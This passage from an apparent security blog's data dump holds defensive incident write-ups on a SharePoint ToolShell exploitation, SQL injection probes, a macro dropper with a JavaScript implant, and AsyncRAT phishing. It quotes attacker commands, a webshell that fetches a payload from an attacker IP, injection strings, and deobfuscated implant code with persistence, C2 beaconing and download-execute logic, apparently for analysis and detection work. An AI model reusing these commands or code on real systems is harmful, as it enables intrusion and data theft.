0 0 58 32025-06-11 14:54:55 GET /pswa/en-US/console.aspx ... LIBERYSV08\\t.minami 192.168.189.129 ... 200 0 0 176 The POST to logon.aspx is the login request. 
The subsequent GET /pswa/en-US/console.aspx returning HTTP 200 confirms the attacker successfully authenticated and reached the interactive PowerShell console. The authenticated username LIBERYSV08\\t.minami and source IP 192.168.189.129 match the backdoor account and attacker IP identified earlier.\nSession ID: LIBERYSV08\\t.minami.250611.075455\nSession terminated at 2025-06-11 14:55:40.\nThe attacker also created a network share ProjectArk for potential lateral movement.\nIOCs # IPs\n- 192.168.189.129 - attacker IP (password spray, SMB hash capture, RDP, PSWA)\nDomains\n- yourc2filemanager.cn - C2 exfiltration server\n- argonaut.ark / project.ark - phishing domains used in lure documents\nFiles\n- C:\\Users\\k.texus\\Desktop\\Project Proposal\\Proposal.url - malicious Internet Shortcut for NTLM hash theft\n- C:\\Users\\k.texus\\Desktop\\Project Proposal\\newproposal.txt - phishing lure document\n- arkproj.zip - exfiltrated archive (783,907 bytes)\nPaths\n- C:\\ProjectArk - source folder of exfiltrated data\nAccounts\n- v.hunter - compromised via password spraying\n- k.texus - compromised via Pass-the-Hash\n- t.minami - backdoor account created by threat actor\nFeatures / Protocols\n- WindowsPowerShellWebAccess - installed as backdoor web gateway\n- WinRM - enabled for persistent remote access\nRecommendations # Immediate Actions\n- Remove backdoor account t.minami and audit all local users on the server\n- Uninstall PSWA and disable WinRM if not required\n- Reset passwords for all compromised accounts: v.hunter, k.texus\n- Block IP 192.168.189.129 and domain yourc2filemanager.cn at the network perimeter\n- Audit all files accessed or copied during the RDP session on 2025-06-11\nPreventive Measures\n- Restrict share permissions - remove Full Control for the Everyone group on all shares\n- Enable SMB signing to prevent NTLM relay and Pass-the-Hash attacks\n- Deploy detection rules for Internet Shortcut files with IconFile pointing to external UNC paths\n- Enforce account lockout policies to 
mitigate password spraying\n- Enable MFA on RDP and all remote access solutions\n- Monitor for PSWA and WinRM installation events via SIEM\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef action fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef start fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; A([\"192.168.189.129Threat Actor\"]):::start --\u003e B[\"14:35:56Password Sprayingv.hunter compromised\"]:::access B --\u003e C[\"14:39:20Proposal share accessedProposal.url + newproposal.txt planted\"]:::action C --\u003e D[\"14:41:38k.texus opens Proposal folderNetNTLM hash automatically sent to attacker\"]:::action D --\u003e E[\"14:42:57Pass-the-HashAuthenticated as k.texus\"]:::access E --\u003e F[\"14:44:48RDP session establishedunder k.texus account\"]:::access subgraph Exfiltration [Exfiltration] F --\u003e G[\"14:46:42arkproj.zip createdC:\\ProjectArk - 783,907 bytes\"]:::exfil G --\u003e H[\"14:46:44arkproj.zip uploadedyourc2filemanager.cn\"]:::exfil end subgraph Persistence [Persistence] H --\u003e I[\"~14:50PSWA installedWinRM enabled\"]:::persist I --\u003e J[\"~14:50Local user t.minami createdAdded to Remote Management Users\"]:::persist J --\u003e K[\"14:54:55Backdoor access confirmedt.minami via PSWA\"]:::persist K --\u003e L([\"14:55:40Session terminatedLIBERYSV08\\t.minami.250611.075455\"]):::persist end ","date":"March 25, 2026","externalUrl":null,"permalink":"/investigations/htb-liberty/","section":"","summary":"Password spraying led to domain account 
compromise, followed by NetNTLM hash theft via a malicious .url file, RDP access, data exfiltration to a C2 server, and PSWA backdoor installation for persistence.","title":"HTB-Liberty","type":"investigations"},{"content":"","date":"March 25, 2026","externalUrl":null,"permalink":"/tags/mftexplorer/","section":"Tags","summary":"","title":"MFTExplorer","type":"tags"},{"content":"","date":"March 25, 2026","externalUrl":null,"permalink":"/tags/smtp/","section":"Tags","summary":"","title":"SMTP","type":"tags"},{"content":"","date":"March 22, 2026","externalUrl":null,"permalink":"/tags/cve-2025-53770/","section":"Tags","summary":"","title":"CVE-2025-53770","type":"tags"},{"content":" Alert # 1EventID: 320 2Severity: Critical 3Event Time: Jul, 22, 2025, 01:07 PM 4Rule: SOC342 - CVE-2025-53770 SharePoint ToolShell Auth Bypass and RCE 5Level: Security Analyst 6Hostname: SharePoint01 7Source IP Address: 107.191.58.76 8Destination IP Address: 172.16.20.17 9HTTP Request Method: POST 10Requested URL: /_layouts/15/ToolPane.aspx?DisplayMode=Edit\u0026amp;a=/ToolPane.aspx 11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 12Referer: /_layouts/SignOut.aspx 13Content-Length: 7699 14Alert Trigger Reason: Suspicious unauthenticated POST request targeting ToolPane.aspx with large payload size and spoofed referer indicative of CVE-2025-53770 exploitation. 15Device Action: Allowed CVE-2025-53770 # CVE-2025-53770 is a critical vulnerability in Microsoft SharePoint Server caused by unsafe deserialization of .NET objects. It allows an unauthenticated attacker with network access to upload a serialized .NET object to the server and achieve remote code execution without any credentials.\nIdentification # Is the traffic coming from outside? # The source IP 107.191.58.76 is an external address. Traffic direction is Internet to Company Network.\nShodan identifies the IP as belonging to Vultr Holdings, LLC (AS20473, Los Angeles, California). 
The hostname resolves to 107.191.58.76.vultrusercontent.com.\nIs the source malicious? # AbuseIPDB shows the IP has been reported 26 times, with a 0% Confidence of Abuse score. Despite the low confidence score, the VPS hosting context and report history are consistent with attacker-controlled infrastructure.\nVirusTotal flagged the IP as malicious by 10/94 vendors.\nWhat type of attack was attempted? # Reviewing the proxy log, a single POST request was sent from 107.191.58.76:25332 to 172.16.20.17:443 at 13:07 targeting /_layouts/15/ToolPane.aspx. The request carried a 7699-byte body and used a spoofed Referer: /_layouts/SignOut.aspx - a characteristic of CVE-2025-53770 exploitation.\nDid anyone else get targeted? # Log review shows all malicious activity targeted exclusively 172.16.20.17 (SharePoint01). No other internal hosts were involved.\nDid the attack succeed? # Yes. The endpoint terminal history confirms full RCE was achieved immediately after the exploit request:\nJul 22 2025 13:07:24\npowershell.exe -nop -w hidden -e PCVAIEltcG9ydC... 
The base64-encoded payload decodes to an ASPX page that uses reflection to invoke MachineKeySection.GetApplicationConfig() and write the server\u0026rsquo;s ValidationKey, DecryptionKey, and related fields to the HTTP response.\nJul 22 2025 13:07:27\ncsc.exe /out:C:\\Windows\\Temp\\payload.exe C:\\Windows\\Temp\\payload.cs\nThe C# compiler was invoked to compile a custom payload from payload.cs into C:\\Windows\\Temp\\payload.exe.\nJul 22 2025 13:07:29\ncmd.exe /c echo \u0026lt;form runat=\u0026#34;server\u0026#34;\u0026gt;\u0026lt;object classid=\u0026#34;clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\u0026#34;\u0026gt;\n\u0026lt;param name=\u0026#34;Command\u0026#34; value=\u0026#34;Redirect\u0026#34;\u0026gt;\u0026lt;param name=\u0026#34;Button\u0026#34; value=\u0026#34;Test\u0026#34;\u0026gt;\n\u0026lt;param name=\u0026#34;Url\u0026#34; value=\u0026#34;http://107.191.58.76/payload.exe\u0026#34;\u0026gt;\u0026lt;/object\u0026gt;\u0026lt;/form\u0026gt;\n\u0026gt; C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx\nA webshell (spinstall0.aspx) was written directly into the SharePoint layouts directory. The webshell contains an ActiveX object that redirects to http://107.191.58.76/payload.exe, enabling the attacker to trigger the payload download.\nJul 22 2025 13:07:34\npowershell.exe -Command \u0026#34;[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()\u0026#34;\nAt 13:08:04 the SharePoint01 endpoint initiated an outbound connection to 107.191.58.76 - a successful reverse callback or payload download.\nTriage Decision # What is the impact level? # The attack fully succeeded. The attacker achieved unauthenticated RCE on SharePoint01, extracted the server\u0026rsquo;s MachineKey, compiled and staged a malicious executable, planted a persistent webshell at a publicly accessible path, and established an active outbound connection to the attacker\u0026rsquo;s C2 at 107.191.58.76. 
The endpoint is fully compromised. Escalated to Tier 2.\nContainment # Is the attacker still active? # Source IP 107.191.58.76 needs to be blocked at the WAF and firewall.\nIs the vulnerable endpoint still exposed? # The /_layouts/15/ToolPane.aspx endpoint needs to be disabled and patched.\nIOCs #\nType | Value | Source\nIP | 107.191.58[.]76 | Proxy / firewall logs\nDomain | vultrusercontent[.]com | Shodan\nURL | hxxps://172.16.20[.]17/_layouts/15/ToolPane.aspx?DisplayMode=Edit\u0026amp;a=/ToolPane.aspx | Proxy log\nURL | hxxp://107.191.58[.]76/payload.exe | Webshell content\nFile | spinstall0.aspx | SharePoint layouts directory\nFile | C:\\Windows\\Temp\\payload.exe |\nFile | C:\\Windows\\Temp\\payload.cs | ","date":"March 22, 2026","externalUrl":null,"permalink":"/blue_team/ld-cve202553770-sharepoint-toolshell-auth-bypass-and-rce/","section":"","summary":"An attacker exploited CVE-2025-53770 against a SharePoint server, achieving unauthenticated RCE via .NET deserialization. The attacker extracted the MachineKey, compiled and dropped a payload, planted a webshell in the SharePoint layouts directory, and established a reverse connection to the attacker-controlled server.","title":"LD-CVE-2025-53770 SharePoint ToolShell Auth Bypass and RCE","type":"blue_team"},{"content":" Alert #\nEventID: 115\nSeverity: High\nEvent Time: Feb, 25, 2022, 11:34 AM\nRule: SOC165 - Possible SQL Injection Payload Detected\nHostname: WebServer1001\nDestination IP Address: 172.16.17.18\nSource IP Address: 167.99.169.17\nHTTP Request Method: GET\nRequested URL: https://172.16.17.18/search/?q=%22%20OR%201%20%3D%201%20--%20-\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\nAlert Trigger Reason: Requested URL Contains OR 1 = 1\nDevice Action: Allowed\nIdentification # Is the traffic coming from outside? # The source IP 167.99.169.17 is hosted on DigitalOcean (AS14061, Santa Clara, US). Shodan associates it with domains ecreaup.com and ecreaup.pro, tagged as cloud and eol-product. 
The IP does not belong to the internal network range - traffic direction is confirmed as Internet to company network.\nIs the source malicious? # AbuseIPDB shows the IP has been reported 14,839 times, however the Confidence of Abuse score is 0%, which can occur when reports are old or unverified. Despite the low confidence score, the volume of historical reports and the DigitalOcean VPS hosting context are consistent with attacker infrastructure.\nVirusTotal flagged the IP as malicious by 3/94 vendors. The low detection count combined with the AbuseIPDB history suggests this IP has been used for multiple abuse campaigns over time.\nWhat type of attack was attempted? # Reviewing the firewall logs, I observed multiple inbound connections from 167.99.169.17 to 172.16.17.18 on port 443 between 11:30 AM and 11:34 AM, all logged as permitted.\nExamining the full request log, the attacker targeted the /search/ endpoint with a series of classic SQL injection payloads delivered via the q GET parameter:\n1https://172.16.17.18/search/?q=\u0026#39; OR \u0026#39;1 2https://172.16.17.18/search/?q=\u0026#39; 3https://172.16.17.18/search/?q=\u0026#39; OR \u0026#39;x\u0026#39;=\u0026#39;x 4https://172.16.17.18/search/?q=1\u0026#39; ORDER BY 3--+ 5https://172.16.17.18/search/?q=\u0026#34; OR 1 = 1 -- - Did anyone else get targeted? # Log review shows all requests from 167.99.169.17 targeted exclusively 172.16.17.18 on the /search/ endpoint on WebServer1001. No other internal hosts were targeted during this timeframe.\nDid the attack succeed? # No. Every SQL injection request returned HTTP 500 Internal Server Error with a response size of 948 bytes, consistent with a generic error page. No successful data extraction or authentication bypass was observed.\nTriage Decision # What is the impact level? # The attacker probed the /search/ endpoint with multiple SQL injection payloads. All requests returned HTTP 500 - the application crashed on the input but did not expose data. 
The attack was malicious and intentional but did not succeed. No escalation to L2 is required. Containment actions and WAF rule updates are sufficient.\nContainment # Is the attacker still active? # The last observed request from 167.99.169.17 was at 11:34 AM. No further connections were observed after that timestamp in the firewall logs.\nIs the vulnerable endpoint still exposed? # The /search/ endpoint on 172.16.17.18 remains exposed and appears to pass unsanitized input to the backend, as evidenced by the HTTP 500 responses to SQLi payloads. Input validation and parameterized queries should be reviewed immediately.\nIs the web server still compromised? # No compromise was achieved. The server returned errors on all injection attempts and no successful response (HTTP 200 with data) was observed. Source IP 167.99.169.17 was blocked at the firewall.\nIOCs #\nType | Value | Source | Blocked\nIP | 167.99.169[.]17 | Firewall / WAF logs | Yes\nURL | hxxps://172.16.17[.]18/search/?q=%22%20OR%201%20%3D%201%20--%20- | WAF alert | Yes\nDomain | ecreaup[.]com | Shodan / AbuseIPDB | Yes\nDomain | ecreaup[.]pro | Shodan / AbuseIPDB | Yes ","date":"March 22, 2026","externalUrl":null,"permalink":"/blue_team/ld-possible-sql-injection-payload-detected/","section":"","summary":"An external IP hosted on DigitalOcean performed a manual SQL injection reconnaissance against an internal web server, cycling through classic SQLi payloads. All requests returned HTTP 500, confirming the attack did not succeed.","title":"LD-Possible SQL Injection Payload Detected","type":"blue_team"},{"content":"","date":"March 22, 2026","externalUrl":null,"permalink":"/tags/sharepoint/","section":"Tags","summary":"","title":"SharePoint","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-03-18 TL;DR # A malicious Word document executes a password-protected VBA macro on open, which drops and runs maintools.js with the passphrase EzZETcSXyKAdF_e5I2i1. 
The script Base64-decodes and RC4-decrypts an embedded blob into stage2.js — a full implant that copies itself to AppData, registers a hidden logon scheduled task named TaskManager, runs 22 recon commands, and enters an infinite loop beaconing to two compromised WordPress sites. On a \u0026quot;work\u0026quot; response from the C2, it downloads, decrypts, and executes a next-stage .pif binary, then deletes it after 30 seconds.\nInitial Analysis # 1MD5: 49b367ac261a722a7c2bbbc328c32545 2SHA256: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751 3 4Composite Document File V2 Document, Little Endian 5OS: Windows, Version 6.1, Code page: 1252 6Author: user — Last Saved By: John 7Created: Fri Nov 25 19:04:00 2016 8Last Saved: Fri Nov 25 20:04:00 2016 9Revision: 11, Pages: 1, Words: 320, Characters: 1828 10Creating Application: Microsoft Office Word 11Total Editing Time: 08:00 olevba # olevba extracted the full VBA source. The macro defines two auto-execution triggers — AutoOpen and AutoClose — and employs several suspicious primitives: file I/O via Open, Put, and Binary; process execution via Shell, WScript.Shell, and Run; OLE object creation via CreateObject; XOR-based string obfuscation; and embedded Base64 strings. 
The only identified IOC is the filename maintools.js.\n1+----------+--------------------+---------------------------------------------+ 2|Type |Keyword |Description | 3+----------+--------------------+---------------------------------------------+ 4|AutoExec |AutoOpen |Runs when the Word document is opened | 5|AutoExec |AutoClose |Runs when the Word document is closed | 6|Suspicious|Environ |May read system environment variables | 7|Suspicious|Open |May open a file | 8|Suspicious|Put |May write to a file (if combined with Open) | 9|Suspicious|Binary |May read or write a binary file | 10|Suspicious|Kill |May delete a file | 11|Suspicious|Shell |May run an executable file or a system cmd | 12|Suspicious|WScript.Shell |May run an executable file or a system cmd | 13|Suspicious|Run |May run an executable file or a system cmd | 14|Suspicious|CreateObject |May create an OLE object | 15|Suspicious|Windows |May enumerate application windows | 16|Suspicious|Xor |May attempt to obfuscate specific strings | 17|Suspicious|Base64 Strings |Base64-encoded strings detected | 18|IOC |maintools.js |Executable file name | 19+----------+--------------------+---------------------------------------------+ VBA analysis # Bypassing password protection # The macro creates a WScript.Shell object via CreateObject, writes an embedded payload to disk as maintools.js, and executes it using the .Run method with a decryption key passed as a command-line argument. I opened the document and accessed the VBA editor via ALT+F11, to inspect the macro source without triggering execution. The VBA project was password-protected.\nI opened the document in HxD Hex Editor and patched the protection flag from DPB= to DPx=, invalidating the password hash.\nReopening the document raised error #40230, which I dismissed. 
I then opened the project properties and set a new password, restoring full access to the macro source for modification and debugging.\nExtracting payload from VBA # I commented out the .Run call and replaced it with a MsgBox statement, to surface the resolved payload path without triggering execution:\n1\u0026#39; R66BpJMgxXBo2h.Run \u0026#34;\u0026#34;\u0026#34;\u0026#34; + OBKHLrC3vEDjVL + \u0026#34;\u0026#34;\u0026#34;\u0026#34; + \u0026#34; EzZETcSXyKAdF_e5I2i1\u0026#34; 2MsgBox \u0026#34;Path: \u0026#34; \u0026amp; OBKHLrC3vEDjVL maintools.js # The script decrypts the embedded payload using CpPT(key, data). The decryption key is the first argument passed from the VBA shell call: EzZETcSXyKAdF_e5I2i1. The decrypted payload is then executed directly in memory via eval():\n1R66BpJMgxXBo2h.Run \u0026#34;\u0026#34;\u0026#34;\u0026#34; + OBKHLrC3vEDjVL + \u0026#34;\u0026#34;\u0026#34;\u0026#34; + \u0026#34; EzZETcSXyKAdF_e5I2i1\u0026#34; 1try { 2 var wvy1 = WScript.Arguments; 3 var ssWZ = wvy1(0); // key = \u0026#34;EzZETcSXyKAdF_e5I2i1\u0026#34; 4 var mw_payload = y3zb(); // retrieve encrypted blob 5 mw_payload = LXv5(mw_payload); // base64 decode 6 mw_payload = CpPT(ssWZ, mw_payload); // decrypt 7 eval(mw_payload); // execute 8} catch (e) { 9 WScript.Quit(); 10} 11 12function LXv5(d27x) { 13 var LUK7 = \u0026#34;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\u0026#34;; 14 //...[snip]... 15} 16 17function CpPT(bOe3, F5vZ) { // decryption 18 var AWy7 = []; 19 var V2Vl = 0; 20 for (var i = 0; i \u0026lt; 256; i++) { AWy7[i] = i; } 21 for (var i = 0; i \u0026lt; 256; i++) { 22 V2Vl = (V2Vl + AWy7[i] + bOe3.charCodeAt(i % bOe3.length)) % 256; 23 //...[snip]... 
24} 25 26function y3zb() { // encrypted payload blob 27 var qGxZ = \u0026#34;zAubgpaJRj0...\u0026#34; 28 return qGxZ; 29} controlled execution # To extract payload I modified the main logic - replaced WScript.Arguments with the hardcoded passphrase, removed eval(), and added fs.writeFileSync to write the decrypted result to disk as stage2.js:\n1try { 2 var ssWZ = \u0026#39;EzZETcSXyKAdF_e5I2i1\u0026#39;; 3 var mw_payload = y3zb(); 4 mw_payload = LXv5(mw_payload); 5 mw_payload = CpPT(ssWZ, mw_payload); 6 const fs = require(\u0026#39;fs\u0026#39;); 7 fs.writeFileSync(\u0026#39;stage2.js\u0026#39;, mw_payload); 8 console.log(\u0026#39;done.\u0026#39;); 9} catch (e) { 10 WScript.Quit(); 11} I executed the modified script and received stage2.js on disk.\nstage2.js # Initialization # It was heavily obfuscated, like the previous stage. I applied a JS beautifier to the output and started analysis.\nAt the top of the script several variables are declared. The variable urls contains two URLs — likely C2 endpoints hosted on compromised WordPress sites. The variable commnds_for_info_gath is an array of 22 shell commands used for system reconnaissance. 
Then the script calls TfOh(), which captures the victim\u0026rsquo;s username via WScript.Network and generates a random string, likely used as a session identifier for C2 communication.\n1var urls = new Array(\u0026#34;http://www.saipadiesel124.com/wp-content/plugins/imsanity/tmp.php\u0026#34;, \u0026#34;http://www.folk-cantabria.com/wp-content/plugins/wp-statistics/includes/classes/gallery_create_page_field.php\u0026#34;); 2var tpO8 = \u0026#34;w3LxnRSbJcqf8HrU\u0026#34;; 3var commnds_for_info_gath = new Array(\u0026#34;systeminfo \u0026gt; \u0026#34;, \u0026#34;net view \u0026gt;\u0026gt; \u0026#34;...); 4var QUjy = new ActiveXObject(\u0026#34;Scripting.FileSystemObject\u0026#34;); 5var LIxF = WScript.ScriptName; 6var w5mY_username = \u0026#34;\u0026#34;; Persistence # The main block starts by resolving the drop path via Blgx(), which receives a WScript.Shell object from bIdG(). Blgx() then selects a writable directory for file operations, preferring AppData\\Local\\Microsoft\\Windows\\, falling back to Temp, and then the legacy Application Data path if neither exists.\n1var wyKN_filepath = Blgx(bIdG()); 2try { 3 var WE86 = bIdG(); 4 rGcR(); 5 jSm8(); 6} catch (e) { 7 WScript.Quit(); 8} 9//...[snip]... 10function Blgx(gaWo) { 11 wyKN_filepath = \u0026#34;c:\\Users\\\\\u0026#34; + w5mY_username + \u0026#34;\\AppData\\Local\\Microsoft\\Windows\\\u0026#34;; 12 if (!QUjy.FOLDEREXISTS(wyKN_filepath)) 13 wyKN_filepath = \u0026#34;c:\\Users\\\u0026#34; + w5mY_username + \u0026#34;\\AppData\\Local\\Temp\\\u0026#34;; 14 if (!QUjy.FOLDEREXISTS(wyKN_filepath)) 15 wyKN_filepath = \u0026#34;c:\\Documents and Settings\\\u0026#34; + w5mY_username + \u0026#34;\\Application Data\\Microsoft\\Windows\\\u0026#34;; 16 return wyKN_filepath 17} After the path is resolved, rGcR() is called for persistence. It copies the script to the drop path and registers a hidden scheduled task named TaskManager under the display name Windows Task Manager to blend with legitimate system tasks. 
The task triggers on user logon and executes the dropped script with the passphrase EzZETcSXyKAdF_e5I2i1 as an argument.\nfunction rGcR() {\n    v_FileName = wyKN_filepath + LIxF.substring(0, LIxF.length - 2) + \u0026#34;js\u0026#34;;\n    QUjy.COPYFILE(WScript.ScriptFullName, wyKN_filepath + LIxF);\n    var HFp7 = (Math.random() * 150 + 350) * 1000;\n    WScript.Sleep(HFp7);\n    eV_C(\u0026#34;TaskManager\u0026#34;, \u0026#34;Windows Task Manager\u0026#34;, w5mY_username, v_FileName, \u0026#34;EzZETcSXyKAdF_e5I2i1\u0026#34;, wyKN_filepath, true);\n}\nC2 loop # After persistence is established, jSm8() starts the main C2 loop.\nIt first calls Fv6b() to collect and encrypt system reconnaissance data, then enters an infinite loop that iterates over both C2 URLs, sending the data and processing the server\u0026rsquo;s response. Fv6b() runs all 22 recon commands via cmd.exe, appending their output to a temp file ~dat.tmp. The file is then read and passed through the encryption function with the hardcoded key 2f532d6baec3d0ec7b1f98aed4774843. After each full iteration the script sleeps for a random interval between 1 and 1.5 hours.\nfunction jSm8() {\n    var enc_info = Fv6b();\n    while (true) {\n        for (var i = 0; i \u0026lt; urls.length; i++) {\n            var each_url = urls[i];\n            var f3cb = XEWG(each_url, enc_info);\n            switch (f3cb) {\n                case \u0026#34;good\u0026#34;: break;\n                case \u0026#34;exit\u0026#34;: WScript.Quit(); break;\n                case \u0026#34;work\u0026#34;: XBL3(each_url); break;\n                case \u0026#34;fail\u0026#34;: tbMu(); break;\n            }\n            TfOh();\n        }\n        WScript.Sleep((Math.random() * 300 + 3600) * 1000);\n    }\n}\n//...[snip]...
function Fv6b() {\n    var infofile = wyKN_filepath + \u0026#34;~dat.tmp\u0026#34;;\n    for (var i = 0; i \u0026lt; commnds_for_info_gath.length; i++) {\n        WE86.Run(\u0026#34;cmd.exe /c \u0026#34; + commnds_for_info_gath[i] + \u0026#34;\\\u0026#34;\u0026#34; + infofile + \u0026#34;\\\u0026#34;\u0026#34;, 0, true);\n    }\n    var nRVN = UspD(infofile);\n    WScript.Sleep(1000);\n    QUjy.DELETEFILE(infofile);\n    return FXx9(\u0026#34;2f532d6baec3d0ec7b1f98aed4774843\u0026#34;, nRVN);\n}\nXEWG() sends the encrypted recon data to the C2 via HTTP POST. The server response text is returned and controls the switch in jSm8().\nfunction XEWG(url, data) {\n    var Kpxo = new ActiveXObject(\u0026#34;MSXML2.XMLHTTP\u0026#34;);\n    Kpxo.OPEN(\u0026#34;post\u0026#34;, url, false);\n    Kpxo.SETREQUESTHEADER(\u0026#34;user-agent:\u0026#34;, \u0026#34;Mozilla/5.0 (Windows NT 6.1; Win64; x64); \u0026#34; + Sz8k());\n    Kpxo.SETREQUESTHEADER(\u0026#34;content-type:\u0026#34;, \u0026#34;application/octet-stream\u0026#34;);\n    var rRi3 = hLit(data, true);\n    Kpxo.SETREQUESTHEADER(\u0026#34;content-length:\u0026#34;, rRi3.length);\n    Kpxo.SEND(rRi3);\n    return Kpxo.responseText;\n}\nOn a \u0026quot;work\u0026quot; response, XBL3() is called. It sends a POST request with the body \u0026quot;work\u0026quot; to the C2 and downloads a binary payload from the response. The payload is decrypted with FXx9() using the same key 2f532d6baec3d0ec7b1f98aed4774843, written to disk as a .pif file, and executed. 
After 30 seconds the file is deleted.\nfunction XBL3(url) {\n    var pif_filename = wyKN_filepath + LIxF.substring(0, LIxF.length - 2) + \u0026#34;pif\u0026#34;;\n    var Kpxo = new ActiveXObject(\u0026#34;MSXML2.XMLHTTP\u0026#34;);\n    Kpxo.OPEN(\u0026#34;post\u0026#34;, url, false);\n    Kpxo.SETREQUESTHEADER(\u0026#34;content-length:\u0026#34;, \u0026#34;4\u0026#34;);\n    Kpxo.SEND(\u0026#34;work\u0026#34;);\n    if (Kpxo.STATUS == 200) {\n        var c0xi = m3mH.ReadText(m3mH.Size);\n        var ptF0 = FXx9(\u0026#34;2f532d6baec3d0ec7b1f98aed4774843\u0026#34;, cz_b(c0xi));\n        NoRS(ptF0, pif_filename); // write to disk\n    }\n    c5ae(pif_filename, url); // execute\n    WScript.Sleep(30000);\n    QUjy.DELETEFILE(pif_filename);\n}\nIOCs # Files\n- maintools.js — first-stage JS payload dropped by VBA macro\n- stage2.js — second-stage implant decrypted from maintools.js\n- ~dat.tmp — temporary recon output file, deleted after use\n- dropped .pif — next-stage binary, deleted after execution\nNetwork\n- http://www.saipadiesel124.com/wp-content/plugins/imsanity/tmp.php\n- http://www.folk-cantabria.com/wp-content/plugins/wp-statistics/includes/classes/gallery_create_page_field.php\nEncryption keys\n- EzZETcSXyKAdF_e5I2i1 — passphrase for maintools.js\n- 2f532d6baec3d0ec7b1f98aed4774843 — key for recon data and payload decryption\nPersistence\n- Scheduled task: TaskManager — display name Windows Task Manager, logon trigger, hidden\nDocument\n- MD5: 49b367ac261a722a7c2bbbc328c32545\n- SHA256: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751\n","date":"March 18, 2026","externalUrl":null,"permalink":"/investigations/cdef-obfuscated/","section":"","summary":"A malicious Word document uses a password-protected AutoOpen macro to drop and execute a JS script, which decrypts an embedded blob into stage2.js. 
It is an implant that establishes persistence via a hidden scheduled task, collects system reconnaissance, and beacons to two compromised WordPress C2 servers, downloading and executing a next-stage .pif payload","title":"CDEF-Obfuscated","type":"investigations"},{"content":"","date":"March 18, 2026","externalUrl":null,"permalink":"/tags/doc/","section":"Tags","summary":"","title":"Doc","type":"tags"},{"content":"","date":"March 18, 2026","externalUrl":null,"permalink":"/tags/reverse-engineering/","section":"Tags","summary":"","title":"Reverse Engineering","type":"tags"},{"content":"","date":"March 17, 2026","externalUrl":null,"permalink":"/tags/asyncrat/","section":"Tags","summary":"","title":"AsyncRAT","type":"tags"},{"content":" Alert #\nAlert type: Phishing\nSeverity: Medium\nEventID: 257\nEvent Time: May 13, 2024, 09:22 AM\nRule: SOC282 - Phishing Alert - Deceptive Mail Detected\nSource: free@coffeeshooop.com (SMTP: 103.80.134.63)\nDestination: Felix@letsdefend.io\nSubject: Free Coffee Voucher\nDevice Action: Allowed\nIdentification # Is the sender spoofed? # The sender domain coffeeshooop.com is a typosquatted domain - the triple o impersonates a legitimate brand. The SMTP address 103.80.134.63 does not belong to any known legitimate infrastructure. SPF, DKIM, and DMARC alignment was checked against the header to confirm spoofing.\nAre there attachments or URLs? # The email contains a \u0026ldquo;Redeem Now\u0026rdquo; button linking to https://files-ld.s3.us-east-2.amazonaws.com/59cbd215-76ea-434d-93ca-4d6aec3bac98-free-coffee.zip and a password-protected attachment free-coffee.zip with password. The password-protected ZIP is a common technique to bypass email gateway scanning.\nWhat does the payload do? 
# The URL was flagged as malicious by 12/95 vendors on VirusTotal and linked to SILENTBUILDER - a dropper and downloader associated with a Conti subgroup.\nThe ZIP contained Coffee.exe (SHA256: cd903ad2211cf7d166646d75e57fb866000f4a3b870b5ec759929be2fd81d334), flagged by 59/72 vendors as AsyncRAT - a .NET backdoor with capabilities including keylogging, remote shell access, and credential theft. The binary is obfuscated, uses long-sleep anti-sandbox techniques, and detects debug environments. Payload type: RAT / backdoor dropper.\nDid anyone else receive this? # The mail gateway log confirms the email was sent exclusively to Felix@letsdefend.io. No other recipients were identified matching the sender address, subject line, or attachment hash. The campaign appears targeted rather than broad.\nDid the user interact? # Proxy and firewall logs confirm Felix interacted with the email. At 12:59 PM, Felix accessed the malicious URL via chrome.exe, downloading the ZIP archive. At 1:00-1:01 PM, Coffee.exe initiated outbound TCP connections to 37.120.233.226:3451 - confirmed AsyncRAT C2 traffic - with two connections permitted by the firewall. A third connection attempt to 127.0.0.1:3451 was denied, consistent with a loopback environment check performed by the malware.\nTriage Decision # What is the impact level? # Felix clicked the \u0026ldquo;Redeem Now\u0026rdquo; link, downloaded and executed Coffee.exe, and established an active C2 channel to 37.120.233.226:3451. Immediately after the C2 connection, AsyncRAT executed a full host reconnaissance sequence via cmd.exe - collecting system info, hostname, disk layout, user accounts, running services, network configuration, and routing table. The endpoint 172.16.20.151 is fully compromised with an active backdoor and confirmed post-exploitation activity. Escalated to L2.\nContainment # Is the email still reachable? # The phishing email was purged from Felix\u0026rsquo;s mailbox. 
